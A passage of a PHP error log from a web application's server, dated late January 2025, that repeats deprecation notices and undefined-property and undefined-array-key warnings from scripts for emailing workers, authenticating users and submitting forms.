line 98 [23-Jan-2025 09:31:16 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 09:31:27 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 09:31:57 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 09:32:12 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 09:32:24 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 09:32:34 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 09:32:55 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 09:33:43 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 09:33:57 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 09:34:07 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 09:34:25 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 09:34:36 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 09:34:52 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 09:35:35 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 09:35:46 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 09:36:01 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 09:36:14 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 09:36:32 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 09:37:01 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 09:37:21 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 12:13:56 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Jan-2025 12:14:34 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 12:14:47 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 12:14:59 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 12:15:08 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 12:15:18 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 12:15:27 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 12:15:36 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 12:15:46 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 12:15:58 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 12:16:08 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 12:44:58 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Jan-2025 12:45:42 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 12:46:17 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 12:47:10 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 12:47:22 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 12:48:24 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 12:48:38 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 12:48:55 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 12:49:30 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 12:49:49 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 12:50:15 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 12:50:29 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 12:50:40 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 12:51:02 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 12:51:14 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 23:06:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Jan-2025 23:16:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Jan-2025 23:16:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Jan-2025 23:32:19 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Jan-2025 23:34:27 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Jan-2025 23:37:38 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 23:37:52 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 23:38:15 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 23:38:28 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 23:40:09 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [24-Jan-2025 00:49:30 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [24-Jan-2025 00:59:11 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [24-Jan-2025 01:10:17 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [24-Jan-2025 01:10:33 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [24-Jan-2025 01:35:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [24-Jan-2025 01:36:56 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [24-Jan-2025 01:37:08 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [24-Jan-2025 01:37:21 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [24-Jan-2025 01:37:34 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [24-Jan-2025 01:38:04 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [24-Jan-2025 01:38:20 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [24-Jan-2025 01:38:36 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [24-Jan-2025 02:25:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [24-Jan-2025 02:25:18 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [24-Jan-2025 02:28:27 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [24-Jan-2025 03:33:32 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [24-Jan-2025 03:44:27 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [24-Jan-2025 03:45:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [24-Jan-2025 03:51:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [24-Jan-2025 03:53:32 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [24-Jan-2025 04:16:02 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [24-Jan-2025 05:00:00 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [24-Jan-2025 05:20:17 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [24-Jan-2025 05:22:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [24-Jan-2025 05:30:38 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [24-Jan-2025 05:35:31 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [24-Jan-2025 05:36:03 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [24-Jan-2025 05:49:54 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [24-Jan-2025 06:13:39 UTC] PHP Warning: Undefined array key "subtask_id" in /home/emeraadmin/public_html/pages/submit_form.php on line 10 [24-Jan-2025 06:13:39 UTC] PHP Warning: Undefined array key "schoolName" in /home/emeraadmin/public_html/pages/submit_form.php on line 11 [24-Jan-2025 06:13:39 UTC] PHP Warning: Undefined array key "date" in /home/emeraadmin/public_html/pages/submit_form.php on line 12 [24-Jan-2025 06:13:39 UTC] PHP Warning: Undefined array key "time" in /home/emeraadmin/public_html/pages/submit_form.php on line 13 [24-Jan-2025 06:13:39 UTC] PHP Warning: Undefined array key "notes" in /home/emeraadmin/public_html/pages/submit_form.php on line 15 [24-Jan-2025 06:13:39 UTC] PHP Warning: Undefined array key "clientName" in /home/emeraadmin/public_html/pages/submit_form.php on line 16 [24-Jan-2025 06:13:39 UTC] PHP Warning: Undefined array key "staffName" in /home/emeraadmin/public_html/pages/submit_form.php on line 17 [24-Jan-2025 06:13:39 UTC] PHP Warning: Undefined array key "clientSignature" in /home/emeraadmin/public_html/pages/submit_form.php on line 18 [24-Jan-2025 06:13:39 UTC] PHP Warning: Undefined array key "staffSignature" in /home/emeraadmin/public_html/pages/submit_form.php on line 19 [24-Jan-2025 06:13:39 UTC] PHP Warning: Undefined array key "latitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 20 [24-Jan-2025 06:13:39 UTC] PHP Warning: Undefined array key "longitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 21 [24-Jan-2025 06:14:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [24-Jan-2025 06:26:52 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [24-Jan-2025 06:53:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [24-Jan-2025 06:53:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [24-Jan-2025 07:10:23 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [24-Jan-2025 07:12:54 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [24-Jan-2025 10:37:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [24-Jan-2025 11:06:59 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [25-Jan-2025 01:22:24 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [26-Jan-2025 05:20:14 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [26-Jan-2025 05:24:14 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [26-Jan-2025 05:24:25 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [26-Jan-2025 05:24:36 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [26-Jan-2025 05:25:01 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [26-Jan-2025 05:25:12 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [26-Jan-2025 05:25:20 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [26-Jan-2025 05:25:31 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [26-Jan-2025 05:25:39 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [26-Jan-2025 05:30:49 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [26-Jan-2025 05:31:08 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [26-Jan-2025 05:31:39 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [26-Jan-2025 05:31:47 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [26-Jan-2025 05:31:55 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [26-Jan-2025 05:32:02 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [26-Jan-2025 10:59:10 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [27-Jan-2025 10:31:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [27-Jan-2025 10:37:26 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 10:37:40 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 10:37:55 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 10:38:08 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 10:39:17 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 10:39:35 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 10:40:12 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 10:42:17 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 10:42:49 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 10:43:07 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 10:44:16 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 10:44:33 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 10:45:00 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 10:58:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [27-Jan-2025 11:00:00 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 11:00:17 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 11:01:25 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 11:01:46 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 11:02:15 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 11:06:02 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 11:06:27 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 11:06:38 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 11:06:54 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 11:08:12 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 11:13:08 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 11:13:18 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 11:13:29 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 11:13:40 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 11:14:50 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 20:22:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [27-Jan-2025 20:23:18 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 20:23:44 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 20:23:55 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 20:24:07 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 20:24:17 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 23:46:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [27-Jan-2025 23:47:04 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 23:47:14 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 23:47:24 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 23:47:36 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 23:47:46 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 23:47:55 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 23:48:12 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 23:48:20 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 23:48:28 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 23:48:36 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 23:54:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [28-Jan-2025 00:57:15 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [28-Jan-2025 00:57:26 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [28-Jan-2025 00:57:40 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [28-Jan-2025 00:57:53 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [28-Jan-2025 00:58:22 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [28-Jan-2025 00:58:38 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 